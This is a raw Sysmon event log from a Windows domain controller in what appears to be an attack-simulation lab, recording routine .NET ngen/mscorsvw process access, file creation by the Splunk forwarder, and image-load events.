23542300x800000000000000018735Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.162{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA008A97FD4757539672B12AF53956D3,SHA256=DA93F8572177ED4EAA7C0243E704766A76C5B04C0F2FCA3B0600477F746E2056,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018734Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.162{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A111-60D3-5F02-00000000CF01}1272C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018733Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:05.162{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A111-60D3-5F02-00000000CF01}1272C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018762Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:06.927{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A112-60D3-6502-00000000CF01}5972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018761Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.912{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A112-60D3-6502-00000000CF01}5972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018760Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:06.912{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A112-60D3-6502-00000000CF01}5972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000018759Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:06.818{4DB9351A-A112-60D3-6402-00000000CF01}2612C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\a34-0\System.DirectoryServices.Protocols.dll2021-06-23 21:01:06.818 10341000x800000000000000018758Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:06.505{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A112-60D3-6402-00000000CF01}2612C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018757Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.490{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A112-60D3-6402-00000000CF01}2612C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018756Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:06.490{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A112-60D3-6402-00000000CF01}2612C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018755Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.458{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A112-60D3-6302-00000000CF01}7056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000018754Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.443{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A112-60D3-6302-00000000CF01}7056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018753Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.443{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A112-60D3-6302-00000000CF01}7056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000018752Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:06.334{4DB9351A-A111-60D3-6202-00000000CF01}6456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1938-0\System.DirectoryServices.AccountManagement.dll2021-06-23 21:01:06.334 23542300x800000000000000018751Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.193{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEA66E568C78539D1DCBA78CA1A52346,SHA256=5888D361A70356278123103898ECD862249390ABB703E4AE2249BF731CF9C6FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018750Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.193{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48454BAAD86B4A530261B08E34B69F92,SHA256=0366A2923568DA7305658EFD241FD8F856FA70CD7CA236F204EE68BB6CF06388,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018749Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.193{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2AA6C477B8AA3CEABB9B47B2C92D7C28,SHA256=696909B6828627DACB90C6C3A8307D82B2C29BFA50311724B871DC4E9C4774CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018783Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:07.912{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A113-60D3-6902-00000000CF01}7128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018782Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.896{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A113-60D3-6902-00000000CF01}7128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018781Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:07.896{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A113-60D3-6902-00000000CF01}7128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018780Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.849{4DB9351A-A113-60D3-6802-00000000CF01}7136NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\I7LZTBZVX2\System.Dynamic.ni.dll.auxMD5=EE1BC091F8771CA0B35329CBAE54A5A2,SHA256=B681B6E8204DC1FE095A6E03FE0984BD1589052088CDB17ECADFCDE32343641B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000018779Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.849{4DB9351A-A113-60D3-6802-00000000CF01}7136NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\I7LZTBZVX2\System.Dynamic.ni.dllMD5=BB8DB5D69A750295C217A48CBDFB1AC3,SHA256=AC12CE15CD82AD1C5D614EE6E16495C3FD361188A9F49E2998A784E3EDC2F4AF,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018778Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:07.818{4DB9351A-A113-60D3-6802-00000000CF01}7136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1be0-0\System.Dynamic.dll2021-06-23 21:01:07.818 10341000x800000000000000018777Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.568{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A113-60D3-6802-00000000CF01}7136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018776Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:07.552{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A113-60D3-6802-00000000CF01}7136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018775Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.552{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A113-60D3-6802-00000000CF01}7136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000018774Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:06.230{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61365-false10.0.1.12-8000- 23542300x800000000000000018773Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.474{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48454BAAD86B4A530261B08E34B69F92,SHA256=0366A2923568DA7305658EFD241FD8F856FA70CD7CA236F204EE68BB6CF06388,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018772Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.474{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A113-60D3-6702-00000000CF01}2080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018771Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.427{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A113-60D3-6702-00000000CF01}2080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018770Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:07.427{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A113-60D3-6702-00000000CF01}2080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 